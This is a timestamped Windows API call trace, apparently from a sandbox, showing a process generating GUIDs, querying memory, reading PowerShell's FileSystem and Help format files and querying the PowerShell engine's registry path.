	[0430.400] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0xedaa7405, Data2=0xf3e4, Data3=0x444d, Data4=([0]=0xb5, [1]=0xf5, [2]=0xcb, [3]=0xd0, [4]=0x24, [5]=0xcc, [6]=0x28, [7]=0xbf))) returned 0x0
	[0430.400] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0x1d1a86e3, Data2=0x4906, Data3=0x47a1, Data4=([0]=0x9a, [1]=0xf8, [2]=0x59, [3]=0x9f, [4]=0xf, [5]=0xc9, [6]=0xda, [7]=0xa7))) returned 0x0
	[0430.400] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0xed21a817, Data2=0x8bd9, Data3=0x4aa1, Data4=([0]=0xa0, [1]=0xf0, [2]=0x9b, [3]=0x6b, [4]=0x75, [5]=0x2b, [6]=0xad, [7]=0xfc))) returned 0x0
	[0430.400] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0xb72f2888, Data2=0xdb9b, Data3=0x4470, Data4=([0]=0x94, [1]=0xeb, [2]=0x31, [3]=0xe8, [4]=0x55, [5]=0xf, [6]=0x58, [7]=0xbe))) returned 0x0
	[0430.400] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0x31055d69, Data2=0xef7e, Data3=0x4ee7, Data4=([0]=0x80, [1]=0x94, [2]=0xb, [3]=0x64, [4]=0xcd, [5]=0xb3, [6]=0x4, [7]=0x48))) returned 0x0
	[0430.400] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0x5bf65ef5, Data2=0x277a, Data3=0x4a0f, Data4=([0]=0x80, [1]=0x83, [2]=0x82, [3]=0x44, [4]=0xad, [5]=0x79, [6]=0x98, [7]=0x6c))) returned 0x0
	[0430.400] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0x86dc40b6, Data2=0x47ad, Data3=0x4370, Data4=([0]=0xad, [1]=0x98, [2]=0xa7, [3]=0xda, [4]=0x22, [5]=0x23, [6]=0x23, [7]=0xbc))) returned 0x0
	[0430.401] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0x3f45764d, Data2=0xd15a, Data3=0x48eb, Data4=([0]=0x8e, [1]=0x2f, [2]=0xaf, [3]=0xcd, [4]=0xa2, [5]=0x0, [6]=0x2a, [7]=0xdc))) returned 0x0
	[0430.401] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0x85f91cd2, Data2=0x2373, Data3=0x463e, Data4=([0]=0xb1, [1]=0x59, [2]=0xd6, [3]=0x73, [4]=0xe2, [5]=0xca, [6]=0x90, [7]=0xdf))) returned 0x0
	[0430.401] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0x3204721d, Data2=0x3ba4, Data3=0x4666, Data4=([0]=0xad, [1]=0x6b, [2]=0x1c, [3]=0xf9, [4]=0x36, [5]=0xc3, [6]=0x5, [7]=0x80))) returned 0x0
	[0430.401] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0xbaf97b82, Data2=0x9824, Data3=0x43c1, Data4=([0]=0x87, [1]=0x6d, [2]=0x21, [3]=0x80, [4]=0x48, [5]=0xe0, [6]=0x76, [7]=0xa))) returned 0x0
	[0430.401] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0xbb465c6d, Data2=0x4d64, Data3=0x4d34, Data4=([0]=0x9e, [1]=0xb6, [2]=0x39, [3]=0x2d, [4]=0x14, [5]=0xb7, [6]=0x81, [7]=0x36))) returned 0x0
	[0430.401] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0xdacfbfbe, Data2=0xd500, Data3=0x4a69, Data4=([0]=0xac, [1]=0xff, [2]=0x11, [3]=0x58, [4]=0x81, [5]=0x66, [6]=0x7f, [7]=0x6a))) returned 0x0
	[0430.401] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0xd46bd254, Data2=0x9893, Data3=0x4084, Data4=([0]=0x9d, [1]=0xa1, [2]=0x2f, [3]=0x66, [4]=0x3d, [5]=0xad, [6]=0x40, [7]=0xce))) returned 0x0
	[0430.402] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0xb5a8edf0, Data2=0xee56, Data3=0x4c03, Data4=([0]=0x84, [1]=0x47, [2]=0xc0, [3]=0xf1, [4]=0x3f, [5]=0x66, [6]=0xec, [7]=0x8b))) returned 0x0
	[0430.402] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0x6a84ed00, Data2=0x4a4c, Data3=0x4115, Data4=([0]=0xb9, [1]=0x2c, [2]=0x29, [3]=0x37, [4]=0x30, [5]=0x4d, [6]=0x63, [7]=0xcb))) returned 0x0
	[0430.402] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0x16ff3639, Data2=0x5498, Data3=0x435a, Data4=([0]=0xbb, [1]=0xe, [2]=0x2b, [3]=0x36, [4]=0xbe, [5]=0xf2, [6]=0xd0, [7]=0x52))) returned 0x0
	[0430.402] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0x2f3f9f7a, Data2=0x16b9, Data3=0x4588, Data4=([0]=0xb0, [1]=0x80, [2]=0x5d, [3]=0xcb, [4]=0x1d, [5]=0xf1, [6]=0xca, [7]=0x61))) returned 0x0
	[0430.402] VirtualQuery (in: lpAddress=0x26bc60, lpBuffer=0x26cb20, dwLength=0x30 | out: lpBuffer=0x26cb20*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.402] VirtualQuery (in: lpAddress=0x26bc60, lpBuffer=0x26cb20, dwLength=0x30 | out: lpBuffer=0x26cb20*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.403] VirtualQuery (in: lpAddress=0x26bc60, lpBuffer=0x26cb20, dwLength=0x30 | out: lpBuffer=0x26cb20*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.403] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0x891723ad, Data2=0x8406, Data3=0x43a6, Data4=([0]=0x9c, [1]=0xd2, [2]=0x51, [3]=0xdc, [4]=0xd0, [5]=0x43, [6]=0x21, [7]=0x8e))) returned 0x0
	[0430.403] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26ca70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0430.403] SetErrorMode (uMode=0x1) returned 0x1
	[0430.404] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1c8
	[0430.404] GetFileType (hFile=0x1c8) returned 0x1
	[0430.404] SetErrorMode (uMode=0x1) returned 0x1
	[0430.404] GetFileType (hFile=0x1c8) returned 0x1
	[0430.404] ReadFile (in: hFile=0x1c8, lpBuffer=0x370bdb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x370bdb0*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.405] ReadFile (in: hFile=0x1c8, lpBuffer=0x370bdb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x370bdb0*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.405] ReadFile (in: hFile=0x1c8, lpBuffer=0x370bdb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x370bdb0*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.406] ReadFile (in: hFile=0x1c8, lpBuffer=0x370bdb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x370bdb0*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.406] ReadFile (in: hFile=0x1c8, lpBuffer=0x370bdb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x370bdb0*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.486] ReadFile (in: hFile=0x1c8, lpBuffer=0x370bdb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x370bdb0*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.486] ReadFile (in: hFile=0x1c8, lpBuffer=0x370bdb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x370bdb0*, lpNumberOfBytesRead=0x26cff8*=0x119, lpOverlapped=0x0) returned 1
	[0430.486] ReadFile (in: hFile=0x1c8, lpBuffer=0x370bdb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x370bdb0*, lpNumberOfBytesRead=0x26cff8*=0x0, lpOverlapped=0x0) returned 1
	[0430.486] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0430.486] SetErrorMode (uMode=0x1) returned 0x1
	[0430.486] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26cfa0 | out: lpFileInformation=0x26cfa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0430.486] SetErrorMode (uMode=0x1) returned 0x1
	[0430.486] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26ccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0430.487] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d088 | out: phkResult=0x26d088*=0x1c8) returned 0x0
	[0430.487] RegQueryValueExW (in: hKey=0x1c8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d00c, lpData=0x0, lpcbData=0x26d008*=0x0 | out: lpType=0x26d00c*=0x1, lpData=0x0, lpcbData=0x26d008*=0x56) returned 0x0
	[0430.487] CoTaskMemAlloc (cb=0x5a) returned 0x1b9a2ef0
	[0430.487] RegQueryValueExW (in: hKey=0x1c8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26cfdc, lpData=0x1b9a2ef0, lpcbData=0x26cfd8*=0x56 | out: lpType=0x26cfdc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26cfd8*=0x56) returned 0x0
	[0430.487] CoTaskMemFree (pv=0x1b9a2ef0) 
	[0430.487] RegCloseKey (hKey=0x1c8) returned 0x0
	[0430.487] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26ccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0430.487] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cb80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0430.488] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.488] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.488] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.489] VirtualQuery (in: lpAddress=0x26bb20, lpBuffer=0x26c9e0, dwLength=0x30 | out: lpBuffer=0x26c9e0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.489] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0xa1148eaa, Data2=0x17c5, Data3=0x43fa, Data4=([0]=0xbc, [1]=0x3c, [2]=0x9d, [3]=0xf9, [4]=0x1a, [5]=0x79, [6]=0x48, [7]=0xe9))) returned 0x0
	[0430.489] VirtualQuery (in: lpAddress=0x26bc60, lpBuffer=0x26cb20, dwLength=0x30 | out: lpBuffer=0x26cb20*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.489] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0xa6402bf7, Data2=0x6edf, Data3=0x46e8, Data4=([0]=0xa1, [1]=0x68, [2]=0x5, [3]=0xaf, [4]=0xd8, [5]=0xaa, [6]=0x18, [7]=0x89))) returned 0x0
	[0430.489] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0x724749a1, Data2=0x4ed6, Data3=0x4158, Data4=([0]=0xab, [1]=0x8b, [2]=0x7b, [3]=0x23, [4]=0xd4, [5]=0x93, [6]=0x3d, [7]=0xb8))) returned 0x0
	[0430.489] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0x501b2634, Data2=0xe1e3, Data3=0x4d7e, Data4=([0]=0xb4, [1]=0xfc, [2]=0x3e, [3]=0x54, [4]=0x89, [5]=0xb9, [6]=0x3c, [7]=0xff))) returned 0x0
	[0430.489] VirtualQuery (in: lpAddress=0x26bc60, lpBuffer=0x26cb20, dwLength=0x30 | out: lpBuffer=0x26cb20*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.490] VirtualQuery (in: lpAddress=0x26bc60, lpBuffer=0x26cb20, dwLength=0x30 | out: lpBuffer=0x26cb20*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0430.490] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26ca70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0430.490] SetErrorMode (uMode=0x1) returned 0x1
	[0430.490] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1c8
	[0430.490] GetFileType (hFile=0x1c8) returned 0x1
	[0430.490] SetErrorMode (uMode=0x1) returned 0x1
	[0430.490] GetFileType (hFile=0x1c8) returned 0x1
	[0430.490] ReadFile (in: hFile=0x1c8, lpBuffer=0x3767f50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x3767f50*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.491] ReadFile (in: hFile=0x1c8, lpBuffer=0x3767f50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x3767f50*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.492] ReadFile (in: hFile=0x1c8, lpBuffer=0x3767f50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x3767f50*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.492] ReadFile (in: hFile=0x1c8, lpBuffer=0x3767f50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x3767f50*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.492] ReadFile (in: hFile=0x1c8, lpBuffer=0x3767f50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x3767f50*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.493] ReadFile (in: hFile=0x1c8, lpBuffer=0x3767f50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x3767f50*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.493] ReadFile (in: hFile=0x1c8, lpBuffer=0x3767f50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x3767f50*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.493] ReadFile (in: hFile=0x1c8, lpBuffer=0x3767f50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x3767f50*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.493] ReadFile (in: hFile=0x1c8, lpBuffer=0x3767f50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x3767f50*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.494] ReadFile (in: hFile=0x1c8, lpBuffer=0x3767f50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x3767f50*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.494] ReadFile (in: hFile=0x1c8, lpBuffer=0x3767f50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x3767f50*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.494] ReadFile (in: hFile=0x1c8, lpBuffer=0x3767f50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x3767f50*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.494] ReadFile (in: hFile=0x1c8, lpBuffer=0x3767f50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x3767f50*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.494] ReadFile (in: hFile=0x1c8, lpBuffer=0x3767f50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x3767f50*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.495] ReadFile (in: hFile=0x1c8, lpBuffer=0x3767f50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x3767f50*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.495] ReadFile (in: hFile=0x1c8, lpBuffer=0x3767f50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x3767f50*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.495] ReadFile (in: hFile=0x1c8, lpBuffer=0x3767f50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x3767f50*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.496] ReadFile (in: hFile=0x1c8, lpBuffer=0x3767f50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x3767f50*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.496] ReadFile (in: hFile=0x1c8, lpBuffer=0x3767f50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x3767f50*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.496] ReadFile (in: hFile=0x1c8, lpBuffer=0x3767f50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x3767f50*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.496] ReadFile (in: hFile=0x1c8, lpBuffer=0x3767f50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x3767f50*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.496] ReadFile (in: hFile=0x1c8, lpBuffer=0x3767f50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x3767f50*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.497] ReadFile (in: hFile=0x1c8, lpBuffer=0x3767f50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x3767f50*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.497] ReadFile (in: hFile=0x1c8, lpBuffer=0x3767f50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x3767f50*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.497] ReadFile (in: hFile=0x1c8, lpBuffer=0x3767f50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x3767f50*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.497] ReadFile (in: hFile=0x1c8, lpBuffer=0x3767f50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x3767f50*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.497] ReadFile (in: hFile=0x1c8, lpBuffer=0x3767f50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x3767f50*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.497] ReadFile (in: hFile=0x1c8, lpBuffer=0x3767f50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x3767f50*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.497] ReadFile (in: hFile=0x1c8, lpBuffer=0x3767f50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x3767f50*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.498] ReadFile (in: hFile=0x1c8, lpBuffer=0x3767f50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x3767f50*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.498] ReadFile (in: hFile=0x1c8, lpBuffer=0x3767f50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x3767f50*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.498] ReadFile (in: hFile=0x1c8, lpBuffer=0x3767f50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x3767f50*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.499] ReadFile (in: hFile=0x1c8, lpBuffer=0x3767f50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x3767f50*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.499] ReadFile (in: hFile=0x1c8, lpBuffer=0x3767f50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x3767f50*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.499] ReadFile (in: hFile=0x1c8, lpBuffer=0x3767f50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x3767f50*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.499] ReadFile (in: hFile=0x1c8, lpBuffer=0x3767f50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x3767f50*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
